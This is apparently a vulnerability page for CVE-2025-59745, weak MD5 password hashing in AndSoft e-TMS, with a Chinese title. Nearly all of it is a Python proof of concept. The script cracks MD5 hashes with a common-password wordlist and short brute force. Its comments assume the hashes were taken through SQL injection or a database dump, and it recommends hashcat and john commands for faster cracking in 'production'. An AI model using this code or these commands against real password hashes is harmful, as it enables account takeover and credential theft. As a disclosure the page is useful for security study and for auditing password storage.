CVE-2025-59745：AndSoft e-TMS使用MD5加密密码漏洞

# CVE-2025-59745 PoC: MD5 Password Hash Cracking for AndSoft e-TMS # This PoC demonstrates how to crack MD5-hashed passwords extracted from AndSoft e-TMS v25.03 import hashlib import itertools import string from concurrent.futures import ThreadPoolExecutor # Sample MD5 hash extracted from AndSoft e-TMS database # (In real scenario, this would be obtained via SQL injection or DB dump) sample_hashes = [ "5d41402abc4b2a76b9719d911017c592", # MD5("hello") "e10adc3949ba59abbe56e057f20f883e", # MD5("123456") "25d55ad283aa400af464c76d713c07ad", # MD5("12345678") "d8578edf8458ce06fbc5bb76a58c5ca4", # MD5("qwerty") ] # Common password wordlist (in real scenario, use rockyou.txt or similar) common_passwords = [ "admin", "password", "123456", "12345678", "qwerty", "abc123", "monkey", "master", "dragon", "login", "hello", "shadow", "sunshine", "princess", "football", "charlie", "letmein", "welcome", "admin123", "root" ] def check_password(hash_to_crack, password): """Check if a password matches the given MD5 hash""" md5_hash = hashlib.md5(password.encode()).hexdigest() return md5_hash == hash_to_crack, password def crack_md5_dictionary(target_hash, wordlist): """Dictionary attack on MD5 hash""" print(f"[*] Attempting dictionary attack on hash: {target_hash}") for password in wordlist: result, pwd = check_password(target_hash, password) if result: print(f"[+] PASSWORD CRACKED: {pwd} -> {target_hash}") return pwd return None def crack_md5_bruteforce(target_hash, max_length=4): """Brute force attack on short MD5 hashes""" print(f"[*] Attempting brute force on hash: {target_hash}") chars = string.ascii_lowercase + string.digits for length in range(1, max_length + 1): for combo in itertools.product(chars, repeat=length): password = ''.join(combo) result, pwd = check_password(target_hash, password) if result: print(f"[+] PASSWORD CRACKED: {pwd} -> {target_hash}") return pwd return None def demonstrate_vulnerability(): print("=" * 60) print("CVE-2025-59745 - AndSoft e-TMS MD5 Hash Cracking PoC") print("=" * 60) for target_hash in sample_hashes: print(f"\n[*] Target hash: {target_hash}") # Try dictionary attack first result = crack_md5_dictionary(target_hash, common_passwords) if not result: # Fallback to brute force for short passwords result = crack_md5_bruteforce(target_hash, max_length=4) if result: print(f"[+] Successfully cracked: {result}") else: print(f"[-] Failed to crack hash: {target_hash}") print("\n[*] Demonstration complete.") print("[*] In production, use hashcat or john the ripper for faster cracking:") print(" hashcat -m 0 hashes.txt rockyou.txt") print(" john --format=raw-md5 hashes.txt") if __name__ == "__main__": demonstrate_vulnerability()